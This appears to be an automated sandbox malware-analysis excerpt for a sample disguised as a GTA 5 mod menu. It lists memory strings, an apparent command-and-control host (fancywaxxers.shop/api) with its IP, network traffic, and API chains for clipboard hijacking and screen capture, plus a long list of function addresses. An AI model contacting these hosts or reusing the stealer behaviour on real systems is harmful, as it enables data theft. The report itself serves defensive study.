                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160705276.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136057544.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160514504.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2137052378.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108339651.0000000003549000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136299155.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830538031.0000000003536000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146894898.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830464050.000000000352C000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338011938.0000000003537000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2192015847.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api9v&?
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiH$0?
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apie
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apizv
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147024672.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api_seed_date
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148144892.0000000005CC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00432280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00432280
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_05AD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,4_2_05AD1000
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00432280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00432280
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004328F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_004328F0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F9EA4E0_2_00F9EA4E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00FA04C20_2_00FA04C2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F934000_2_00F93400
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F8DDA20_2_00F8DDA2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F8969B0_2_00F8969B
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F9EA4E3_2_00F9EA4E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00FA04C23_2_00FA04C2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F934003_2_00F93400
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F8DDA23_2_00F8DDA2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F8969B3_2_00F8969B
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004379604_2_00437960
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004221114_2_00422111
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043F1A04_2_0043F1A0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004262604_2_00426260
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043026B4_2_0043026B
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043B2704_2_0043B270
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040BB474_2_0040BB47
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00409BE04_2_00409BE0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004153E84_2_004153E8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040D3F64_2_0040D3F6
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043FC304_2_0043FC30
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00437C804_2_00437C80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00420DE04_2_00420DE0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004406604_2_00440660
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042BE7C4_2_0042BE7C
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00411E104_2_00411E10
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041071B4_2_0041071B
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004087804_2_00408780
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042F0504_2_0042F050
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004320104_2_00432010
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004408204_2_00440820
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004240C34_2_004240C3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043E8C04_2_0043E8C0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004238EB4_2_004238EB
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004390804_2_00439080
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043F8A04_2_0043F8A0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004039404_2_00403940
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004389504_2_00438950
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004059604_2_00405960
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042A1604_2_0042A160
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004181664_2_00418166
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004169134_2_00416913
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043611F4_2_0043611F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004061C04_2_004061C0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040A9C04_2_0040A9C0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004281D34_2_004281D3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004371D04_2_004371D0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004081E04_2_004081E0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004259E04_2_004259E0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040B1A54_2_0040B1A5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041D9B04_2_0041D9B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004219B04_2_004219B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004092704_2_00409270
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042EA714_2_0042EA71
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00424A084_2_00424A08
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042E2094_2_0042E209
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00422A314_2_00422A31
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004392354_2_00439235
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00415AD04_2_00415AD0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004162DD4_2_004162DD
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004042F04_2_004042F0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004292F34_2_004292F3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004142804_2_00414280
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043EB604_2_0043EB60
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00436B674_2_00436B67
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004113774_2_00411377
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041F3DA4_2_0041F3DA
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041D3E04_2_0041D3E0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043BB804_2_0043BB80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00402BA04_2_00402BA0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004194404_2_00419440
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004274494_2_00427449
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042F45F4_2_0042F45F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004484604_2_00448460
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004274724_2_00427472
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004204704_2_00420470
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00417C0E4_2_00417C0E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004074304_2_00407430
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00404C304_2_00404C30
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004374304_2_00437430
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042C4D24_2_0042C4D2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043F4D04_2_0043F4D0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040E4DE4_2_0040E4DE
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041BCF04_2_0041BCF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041CC804_2_0041CC80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043CC954_2_0043CC95
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004305404_2_00430540
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042C5594_2_0042C559
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041A5704_2_0041A570
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00427D0D4_2_00427D0D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00418DC34_2_00418DC3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042FDDC4_2_0042FDDC
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004265E04_2_004265E0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042C5EC4_2_0042C5EC
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004066504_2_00406650
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00431E004_2_00431E00
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00416E0E4_2_00416E0E
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00405E204_2_00405E20
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004286304_2_00428630
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446EC74_2_00446EC7
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446ECF4_2_00446ECF
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446ECB4_2_00446ECB
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446ED34_2_00446ED3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446EF74_2_00446EF7
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004096904_2_00409690
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004386904_2_00438690
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446EAE4_2_00446EAE
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00426EBC4_2_00426EBC
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00402F404_2_00402F40
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0042B76F4_2_0042B76F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0043E7704_2_0043E770
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004227324_2_00422732
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00427F324_2_00427F32
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041A7C64_2_0041A7C6
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040AFF24_2_0040AFF2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0040F7F94_2_0040F7F9
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_0041D7804_2_0041D780
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_00446FA04_2_00446FA0
